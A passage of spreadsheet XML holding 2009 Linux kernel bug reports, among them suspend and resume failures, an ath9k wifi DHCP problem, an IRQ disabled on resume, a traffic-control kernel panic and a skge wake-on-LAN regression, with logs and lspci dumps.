    <t>2009-03-09 08:18 UTC</t>
  </si>
  <si>
    <t>Raymond Wooninck</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: 2.6.29 Distribution: openSUSE Factory (11.2) Hardware Environment: IBM ThinkPad T42 Software Environment: Problem Description: When I suspend my notebook to sleep (state S3), then the power consumption remains high and drains the battery in a couple of hours. When I boot with the older kernel version (2.6.27.13) then I have a normal power drainage during sleep. I have tested this with the acpi-sleep script from thinkwiki.org, which is used to test if an IBM laptop is suffering from the radeon bug. This is exactly the same system and I am just booting with either on of the kernels. So nothing in the hardware nor distribution is changed apart from the used kernel. Steps to reproduce: Execute the attached script and validate the values in the /var/log/battery.log file.</t>
  </si>
  <si>
    <t>genhd.h comment needs updating.</t>
  </si>
  <si>
    <t>2009-03-09 09:35 UTC</t>
  </si>
  <si>
    <t>2009-03-09 12:57 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: NA Earliest failing kernel version: NA Distribution: NA Hardware Environment: NA Software Environment: NA Problem Description: The include/linux/genhd.h file, on line 338-352 declares some function prototypes in which the comment on line 338 states that the definition of these prototypes are to be found at drivers/block/genhd.c. The problem is that genhd.c has been relocated to block/genhd.c Here is a patch correcting this minor cosmetic typo: --- include/linux/genhd.h~ 2009-02-20 16:41:27.000000000 -0600 +++ include/linux/genhd.h 2009-03-09 11:27:02.752835800 -0500 @@ -335,7 +335,7 @@ /* drivers/block/ll_rw_blk.c */ extern void part_round_stats(int cpu, struct hd_struct *part); -/* drivers/block/genhd.c */ +/* block/genhd.c */ extern int get_blkdev_list(char *, int); extern void add_disk(struct gendisk *disk); extern void del_gendisk(struct gendisk *gp); Steps to reproduce: NA</t>
  </si>
  <si>
    <t>no connection to network with ath9k</t>
  </si>
  <si>
    <t>linux-image-2.6.29-rc7-amd64   ;   2.6.28</t>
  </si>
  <si>
    <t>2009-03-10 11:58 UTC</t>
  </si>
  <si>
    <t>Pierre Meurisse</t>
  </si>
  <si>
    <t>2009-03-16 02:21 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version:2.6.26 Distribution:debian Hardware Environment: Software Environment: Problem Description: &gt; Package: linux-image-2.6.28-1-amd64 &gt; Version: 2.6.28-2~snapshot.12850 &gt; Severity: important &gt; &gt; My wifi Intel-Atheros interface doesn't connect. &gt; &gt; pier@co64sid~% sudo /etc/init.d/networking restart &gt; Reconfiguring network interfaces...There is already a pid file &gt; /var/run/dhclient.wlan0.pid with pid 4723 &gt; killed old client process, removed PID file &gt; Internet Systems Consortium DHCP Client V3.1.1 &gt; Copyright 2004-2008 Internet Systems Consortium. &gt; All rights reserved. &gt; For info, please visit http://www.isc.org/sw/dhcp/ &gt; &gt; wmaster0: unknown hardware address type 801 &gt; wmaster0: unknown hardware address type 801 &gt; Listening on LPF/wlan0/00:22:43:22:b8:de &gt; Sending on LPF/wlan0/00:22:43:22:b8:de &gt; Sending on Socket/fallback &gt; Internet Systems Consortium DHCP Client V3.1.1 &gt; Copyright 2004-2008 Internet Systems Consortium. &gt; All rights reserved. &gt; For info, please visit http://www.isc.org/sw/dhcp/ &gt; &gt; wmaster0: unknown hardware address type 801 &gt; wmaster0: unknown hardware address type 801 &gt; Listening on LPF/wlan0/00:22:43:22:b8:de &gt; Sending on LPF/wlan0/00:22:43:22:b8:de &gt; Sending on Socket/fallback &gt; DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 6 &gt; DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 12 &gt; DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 17 &gt; DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 8 &gt; DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 15 &gt; DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 3 &gt; No DHCPOFFERS received. &gt; No working leases in persistent database - sleeping. &gt; done. &gt; &gt; &gt; My /etc/network/interfaces : &gt; # The loopback network interface &gt; auto lo &gt; iface lo inet loopback &gt; &gt; # wifi &gt; auto wlan0 &gt; iface wlan0 inet dhcp &gt; pre-up /sbin/ifconfig wlan0 up # tried with and without that line &gt; wpa-conf managed &gt; wpa-ssid my_essid &gt; # wpa-key-mgmt WPA-PSK &gt; wpa-psk _my key_ &gt; &gt; &gt; &gt; I tried linux-image-2.6.29-rc7-amd64 too ; it doesn't work either. 02:00.0 Network controller [0280]: Atheros Communications Inc. AR928X Wireless Network Adapter (PCI-Express) [168c:002a] (rev 01) Subsystem: Device [1a3b:1067] Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 16 Region 0: Memory at fdff0000 (64-bit, non-prefetchable) [size=64K] Capabilities: &lt;access denied&gt; Kernel driver in use: ath9k Kernel modules: ath9k 00:04.0 Ethernet controller [0200]: Silicon Integrated Systems [SiS] 191 Gigabit Ethernet Adapter [1039:0191] (rev 02) Subsystem: ASUSTeK Computer Inc. Device [1043:1815] Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 19 Region 0: Memory at f9ffcc00 (32-bit, non-prefetchable) [size=128] Region 1: I/O ports at cc00 [size=128] Capabilities: &lt;access denied&gt; Kernel driver in use: sis190 Kernel modules: sis190 Some modules loaded: ath9k 306856 0 mac80211 221616 1 ath9k led_class 70280 2 ath9k,asus_laptop Steps to reproduce:</t>
  </si>
  <si>
    <t>On resume irq 16 get's disabled.</t>
  </si>
  <si>
    <t>2009-03-10 17:08 UTC</t>
  </si>
  <si>
    <t>Jonathan Larsen</t>
  </si>
  <si>
    <t>2009-04-15 11:41 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.28.7 Earliest failing kernel version: 2.6.28.7 Distribution: Slackware 12.2 Hardware Environment: Acer Aspire One 10.1" Software Environment: XFCE 4.6 Problem Description: Using either pm-suspend from the cli or XFCE4.6 new built in suspend function (which calls pm-suspend from hal from what i was told by rworkman one of Slackwares dev's), on resume i get a kernel message telling me that IRQ 16 is disabled. If i do an echo -n mem &gt; /sys/power/state I don't see this behavior. Steps to reproduce: running pm-suspend from cli or using xfce4.6 suspend function. I have SUSPEND_MODULES="snd-hda-intel" in my /etc/pm/config.d/defaults syslog: Feb 20 11:58:05 sol kernel: irq 16: nobody cared (try booting with the "irqpoll" option) Feb 20 11:58:05 sol kernel: Pid: 3322, comm: pm-suspend Not tainted 2.6.28.6-smp #1 Feb 20 11:58:05 sol kernel: Call Trace: Feb 20 11:58:05 sol kernel: [&lt;c0150c84&gt;] __report_bad_irq+0x24/0x80 Feb 20 11:58:05 sol kernel: [&lt;f8907195&gt;] azx_interrupt+0x15/0x120 [snd_hda_intel] Feb 20 11:58:05 sol kernel: [&lt;c0150e30&gt;] note_interrupt+0x150/0x190 Feb 20 11:58:05 sol kernel: [&lt;c014fb15&gt;] handle_IRQ_event+0x25/0x50 Feb 20 11:58:05 sol kernel: [&lt;c01517f8&gt;] handle_fasteoi_irq+0x78/0xd0 Feb 20 11:58:05 sol kernel: [&lt;c0105997&gt;] do_IRQ+0x77/0x90 Feb 20 11:58:05 sol kernel: [&lt;c010599c&gt;] do_IRQ+0x7c/0x90 Feb 20 11:58:05 sol kernel: [&lt;c010599c&gt;] do_IRQ+0x7c/0x90 Feb 20 11:58:05 sol kernel: [&lt;c0103dd7&gt;] common_interrupt+0x23/0x28 Feb 20 11:58:05 sol kernel: [&lt;c0109b12&gt;] native_read_tsc+0x2/0x10 Feb 20 11:58:05 sol kernel: [&lt;c037d0ca&gt;] delay_tsc+0x2a/0x50 Feb 20 11:58:05 sol kernel: [&lt;c037d066&gt;] __delay+0x6/0x10 Feb 20 11:58:05 sol kernel: [&lt;f8906b3a&gt;] azx_get_response+0x10a/0x1c0 [snd_hda_intel] Feb 20 11:58:05 sol kernel: [&lt;f8906a1c&gt;] azx_send_cmd+0xcc/0xe0 [snd_hda_intel] Feb 20 11:58:05 sol kernel: [&lt;f890847e&gt;] snd_hda_codec_read+0x4e/0x70 [snd_hda_intel] Feb 20 11:58:05 sol kernel: [&lt;f8908a25&gt;] hda_set_power_state+0x145/0x190 [snd_hda_intel] Feb 20 11:58:05 sol kernel: [&lt;f8908ac1&gt;] snd_hda_resume+0x51/0x80 [snd_hda_intel] Feb 20 11:58:05 sol kernel: [&lt;f8907785&gt;] azx_resume+0x75/0xe0 [snd_hda_intel] Feb 20 11:58:05 sol kernel: [&lt;c038e373&gt;] pci_legacy_resume+0x13/0x20 Feb 20 11:58:05 sol kernel: [&lt;c03ef8e2&gt;] pm_op+0x82/0x120 Feb 20 11:58:05 sol kernel: [&lt;c03f00a4&gt;] device_resume+0xe4/0x370 Feb 20 11:58:05 sol kernel: [&lt;c014a578&gt;] suspend_devices_and_enter+0xe8/0x150 Feb 20 11:58:05 sol kernel: [&lt;c014abdc&gt;] freeze_processes+0x3c/0x80 Feb 20 11:58:05 sol kernel: [&lt;c014a75b&gt;] enter_state+0x12b/0x140 Feb 20 11:58:05 sol kernel: [&lt;c014a804&gt;] state_store+0x94/0xe0 Feb 20 11:58:05 sol kernel: [&lt;c014a770&gt;] state_store+0x0/0xe0 Feb 20 11:58:05 sol kernel: [&lt;c0377b64&gt;] kobj_attr_store+0x24/0x30 Feb 20 11:58:05 sol kernel: [&lt;c01c6040&gt;] sysfs_write_file+0xc0/0x110 Feb 20 11:58:05 sol kernel: [&lt;c01c5f80&gt;] sysfs_write_file+0x0/0x110 Feb 20 11:58:05 sol kernel: [&lt;c018366f&gt;] vfs_write+0x9f/0x140 Feb 20 11:58:05 sol kernel: [&lt;c0183be1&gt;] sys_write+0x41/0x70 Feb 20 11:58:05 sol kernel: [&lt;c01032f2&gt;] syscall_call+0x7/0xb Feb 20 11:58:05 sol kernel: [&lt;c0710000&gt;] i8042_probe+0x1e0/0x5f0 Feb 20 11:58:05 sol kernel: handlers: Feb 20 11:58:05 sol kernel: [&lt;c05d3890&gt;] (usb_hcd_irq+0x0/0x70) Feb 20 11:58:05 sol kernel: [&lt;c05d3890&gt;] (usb_hcd_irq+0x0/0x70) Feb 20 11:58:05 sol kernel: [&lt;f8907180&gt;] (azx_interrupt+0x0/0x120 [snd_hda_intel]) Feb 20 11:58:05 sol kernel: Disabling IRQ #16 Feb 20 11:58:05 sol kernel: hda_intel: azx_get_response timeout, switching to polling mode: last cmd=0x011f000c Feb 20 11:58:05 sol kernel: hda_intel: azx_get_response timeout, switching to single_cmd mode: last cmd=0x011f000c Feb 20 11:58:05 sol kernel: hda_codec: invalid dep_range_val 0:7fff Feb 20 11:58:05 sol last message repeated 126 times Feb 20 11:58:05 sol kernel: usb usb2: root hub lost power or was reset Feb 20 11:58:05 sol kernel: usb usb3: root hub lost power or was reset Feb 20 11:58:05 sol kernel: usb usb4: root hub lost power or was reset Feb 20 11:58:05 sol kernel: usb usb5: root hub lost power or was reset syslog on resume after irqpoll is enabled: Mar 10 07:08:58 sol kernel: Freezing user space processes ... restoring config space at offset 0x1 (was 0x900007, writing 0x900003) Mar 10 07:08:58 sol kernel: ata3: EH pending after 5 tries, giving up Mar 10 07:08:58 sol last message repeated 6 times Mar 10 07:08:58 sol kernel: ata1: EH pending after 5 tries, giving up Mar 10 07:08:58 sol last message repeated 230 times Mar 10 07:08:58 sol kernel: hda_intel: azx_get_response timeout, switching to polling mode: last cmd=0x011f000c Mar 10 07:08:58 sol kernel: ata1: EH pending after 5 tries, giving up Mar 10 07:08:58 sol last message repeated 4 times Mar 10 07:08:58 sol kernel: ata3: EH pending after 5 tries, giving up Mar 10 07:08:58 sol last message repeated 26 times Mar 10 07:08:58 sol kernel: ata1: EH pending after 5 tries, giving up Mar 10 07:08:58 sol last message repeated 17 times Mar 10 07:08:58 sol kernel: ata3: EH pending after 5 tries, giving up Mar 10 07:08:58 sol last message repeated 6 times Mar 10 07:08:58 sol kernel: ata1: EH pending after 5 tries, giving up Mar 10 07:08:58 sol last message repeated 6 times Mar 10 07:08:58 sol kernel: ata3: EH pending after 5 tries, giving up Mar 10 07:08:58 sol last message repeated 221 times Mar 10 07:08:58 sol kernel: hda_intel: azx_get_response timeout, switching to single_cmd mode: last cmd=0x011f000c Mar 10 07:08:58 sol kernel: hda_codec: invalid dep_range_val 0:7fff Mar 10 07:08:58 sol last message repeated 126 times Mar 10 07:08:58 sol kernel: usb usb2: root hub lost power or was reset Mar 10 07:08:58 sol kernel: usb usb3: root hub lost power or was reset Mar 10 07:08:58 sol kernel: usb usb4: root hub lost power or was reset Mar 10 07:08:58 sol kernel: usb usb5: root hub lost power or was reset Mar 10 07:08:58 sol kernel: Restarting tasks ... done.</t>
  </si>
  <si>
    <t>rb_erase Kernel Panic</t>
  </si>
  <si>
    <t>2009-03-11 23:15 UTC</t>
  </si>
  <si>
    <t>m0sia</t>
  </si>
  <si>
    <t>2010-01-19 21:37 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Problem Description: rb_erase Kernel Panic EIP: [&lt;c01c313b&gt;] rb_erase+0xf6/Bx22f SS:ESP 0068:da3c3e34 Kernel panic - not syncing: Fatal exception in interrupt Full call trace in attachment. Steps to reproduce: tc qdisc add dev eth1 root handle 1: htb tc class add dev eth1 parent 1: classid 1:1 htb rate 36000Kbit tc class add dev eth1 parent 1:1 classid 1:11 htb rate 28000Kbit prio 0 tc class add dev eth1 parent 1:1 classid 1:15 htb rate 1000Kbit ceil 28000Kbit prio 0 tc class add dev eth1 parent 1:1 classid 1:19 htb rate 1000Kbit ceil 5000Kbit prio 2 N from 10 to 10k(One class and filter per user) tc class add dev eth1 parent 1:{11,15,19} classid 1:$N htb rate 1Kbit ceil {$SPEED}Kbit tc filter add dev eth1 parent parent 1: protocol ip pref $N handle $N fw flowid 1:$N Classes and filters for users may change or add in real time.</t>
  </si>
  <si>
    <t>No headphone control in Sigmatel HDA</t>
  </si>
  <si>
    <t>2009-03-12 12:44 UTC</t>
  </si>
  <si>
    <t>2009-03-14 11:16 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.28 Earliest failing kernel version: 2.6.29-rc7? Distribution: Ubuntu Jaunty Hardware Environment: Dell Vostro 1400 Software Environment: Alsa/Audacious Problem Description: Inserting a headphone does not kill sound on built-in speakers, there is no separate headphone volume/mute control in alsamixer under 2.6.29-rc7 Steps to reproduce: boot 2.6.29-rc7, play audio, plug headphone: still sound from internal speakers (AND sound from headphones). No headphones volume/mute in kmix or alsamixer.</t>
  </si>
  <si>
    <t>2.6.29-rc7 broke r8169 MAC on Thecus n2100 ARM board</t>
  </si>
  <si>
    <t>2009-03-14 11:29 UTC</t>
  </si>
  <si>
    <t>2009-04-26 11:16 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] 2.6.29-rc7 broke r8169 MAC on Thecus n2100 ARM board Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Date : 2009-03-09 20:29 References : http://marc.info/?l=linux-kernel&amp;m=123663065403760&amp;w=4 Handled-By : Francois Romieu &lt;romieu@fr.zoreil.com&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG when disabled ipv6 module is unloaded</t>
  </si>
  <si>
    <t>2.6.29-rc7-git3</t>
  </si>
  <si>
    <t>2009-03-14 11:49 UTC</t>
  </si>
  <si>
    <t>2009-03-21 11:48 UTC</t>
  </si>
  <si>
    <t>Subject : BUG when unloading bonding on 2.6.29-rc7-git3 Submitter : Thomas Backlund &lt;tmb@mandriva.org&gt; Date : 2009-03-10 20:15 References : http://marc.info/?l=linux-kernel&amp;m=123671614621097&amp;w=4 Handled-By : John Dykstra &lt;john.dykstra1@gmail.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123672746905127&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.29-rc "TKIP: replay detected" regression</t>
  </si>
  <si>
    <t>2009-03-14 11:52 UTC</t>
  </si>
  <si>
    <t>2009-04-07 21:27 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.29-rc "TKIP: replay detected" regression Submitter : Hugh Dickins &lt;hugh@veritas.com&gt; Date : 2009-03-11 12:07 References : http://marc.info/?l=linux-kernel&amp;m=123677337219148&amp;w=4 Handled-By : "John W. Linville" &lt;linville@tuxdriver.com&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>usb bluetooth crashes system</t>
  </si>
  <si>
    <t>2009-03-14 11:58 UTC</t>
  </si>
  <si>
    <t>2009-04-26 11:18 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.29-rc5+: usb bluetooth crashes system Submitter : Pavel Machek &lt;pavel@ucw.cz&gt; Date : 2009-03-10 11:23 References : http://marc.info/?l=linux-kernel&amp;m=123668450400940&amp;w=4 Notify-Also : Greg KH &lt;greg@kroah.com&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>pwc mmap always fails with EAGAIN</t>
  </si>
  <si>
    <t>2009-03-14 12:02 UTC</t>
  </si>
  <si>
    <t>2009-04-26 11:19 UTC</t>
  </si>
  <si>
    <t>Subject : REGRESSION: 2.6.28.7 =&gt; 2.6.29-rc8: pwc mmap always failes with EAGAIN Submitter : Markus &lt;M4rkusXXL@web.de&gt; Date : 2009-03-14 16:42 References : http://marc.info/?l=linux-kernel&amp;m=123704902201378&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[regression after 2.6.18] resume failure - MSI PR200WX-058EU</t>
  </si>
  <si>
    <t>2009-03-15 08:03 UTC</t>
  </si>
  <si>
    <t>Eddy Petrișor</t>
  </si>
  <si>
    <t>2014-02-10 19:41 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: - Earliest failing kernel version: 2.6.25 Distribution: Debian GNU/Linux Lenny Hardware Environment: MSI PR200WX-058EU laptop (Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 03)) Software Environment: Debian Lenny (GNOME) Problem Description: When trying to put the laptop to sleep, it works without any problem, but when I press the power button to recover from sleep the laptop seems to recover, but the screen remains blank and the fans start to spin up and nothing can be done until I press the power button once more. At that point the laptop restarts. Neither opening the lid nor pressing other keys wake up the laptop from sleep, but this is consistent with the way Windows wakes up. The laptop recovers fine from sleep in Windows XP. The DSDT disassembly shows different paths for Windows and Linux. Steps to reproduce: 1. put the laptop to sleep from gnome-power-manager 2. try to wake up the laptop by pressing the power button 3. the screen remains blank</t>
  </si>
  <si>
    <t>skge wake on lan</t>
  </si>
  <si>
    <t>2009-03-16 14:49 UTC</t>
  </si>
  <si>
    <t>Tomi Orava</t>
  </si>
  <si>
    <t>2009-07-21 23:04 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: - Earliest failing kernel version: commit 5177b3240a6608fc0c9c05cc32f4855c6540f8d5 Distribution: Fedora (with standard mainline kernel) Hardware Environment: Asus A7V880-motherboard Software Environment: Fedora 9 Problem Description: The skge-drivers commit from last october seems to have broken the wake-on-lan feature from my machine. Reverting the above mentioned commit fixes the problem again ie. WOL is working again without problems. The broken patch did not produce any errors or such, only symptom was that WOL did not work anymore. The loading of the nvidia module did not change the situation at all (for the record). valen#root&gt;lspci -vv 00:00.0 Host bridge: VIA Technologies, Inc. KT880 Host Bridge (rev 80) Subsystem: ASUSTeK Computer Inc. Unknown device 8122 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Latency: 96 Region 0: Memory at e0000000 (32-bit, prefetchable) [size=256M] Capabilities: [80] AGP version 3.5 Status: RQ=32 Iso- ArqSz=0 Cal=2 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3+ Rate=x8 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:00.1 Host bridge: VIA Technologies, Inc. KT880 Host Bridge Subsystem: ASUSTeK Computer Inc. Unknown device 8122 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 00:00.2 Host bridge: VIA Technologies, Inc. KT880 Host Bridge Subsystem: ASUSTeK Computer Inc. Unknown device 8122 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 00:00.3 Host bridge: VIA Technologies, Inc. KT880 Host Bridge Subsystem: ASUSTeK Computer Inc. Unknown device 8122 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 00:00.4 Host bridge: VIA Technologies, Inc. KT880 Host Bridge Subsystem: ASUSTeK Computer Inc. Unknown device 8122 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 00:00.7 Host bridge: VIA Technologies, Inc. KT880 Host Bridge Subsystem: ASUSTeK Computer Inc. Unknown device 8122 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 00:01.0 PCI bridge: VIA Technologies, Inc. VT8237/VX700 PCI Bridge (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 Memory behind bridge: fc100000-fe2fffff Prefetchable memory behind bridge: 9ff00000-afefffff Secondary status: 66MHz+ FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR+ BridgeCtl: Parity+ SERR+ NoISA- VGA+ MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [70] Power Management version 2 Flags: PMEClk- DSI- D1+ D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:09.0 Ethernet controller: Marvell Technology Group Ltd. 88E8001 Gigabit Ethernet Controller (rev 13) Subsystem: ASUSTeK Computer Inc. Marvell 88E8001 Gigabit Ethernet Controller (Asus) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 96 (5750ns min, 7750ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 18 Region 0: Memory at fe400000 (32-bit, non-prefetchable) [size=16K] Region 1: I/O ports at e000 [size=256] Expansion ROM at fe300000 [disabled] [size=128K] Capabilities: [48] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=1 PME- Capabilities: [50] Vital Product Data &lt;?&gt; Kernel driver in use: skge 00:0f.0 RAID bus controller: VIA Technologies, Inc. VIA VT6420 SATA RAID Controller (rev 80) Subsystem: ASUSTeK Computer Inc. A7V600/K8V Deluxe/K8V-X/A8V Deluxe motherboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 96 Interrupt: pin B routed to IRQ 20 Region 0: I/O ports at eff0 [size=8] Region 1: I/O ports at efe4 [size=4] Region 2: I/O ports at efa8 [size=8] Region 3: I/O ports at efe0 [size=4] Region 4: I/O ports at ef90 [size=16] Region 5: I/O ports at e800 [size=256] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: sata_via 00:0f.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) (prog-if 8a [Master SecP PriP]) Subsystem: ASUSTeK Computer Inc. A7V600/K8V-X/A8V Deluxe motherboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32 Interrupt: pin A routed to IRQ 20 Region 0: [virtual] Memory at 000001f0 (32-bit, non-prefetchable) [size=8] Region 1: [virtual] Memory at 000003f0 (type 3, non-prefetchable) [size=1] Region 2: [virtual] Memory at 00000170 (32-bit, non-prefetchable) [size=8] Region 3: [virtual] Memory at 00000370 (type 3, non-prefetchable) [size=1] Region 4: I/O ports at fc00 [size=16] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: pata_via 00:10.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 96, Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 21 Region 4: I/O ports at eec0 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:10.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 96, Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 21 Region 4: I/O ports at ef00 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:10.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- 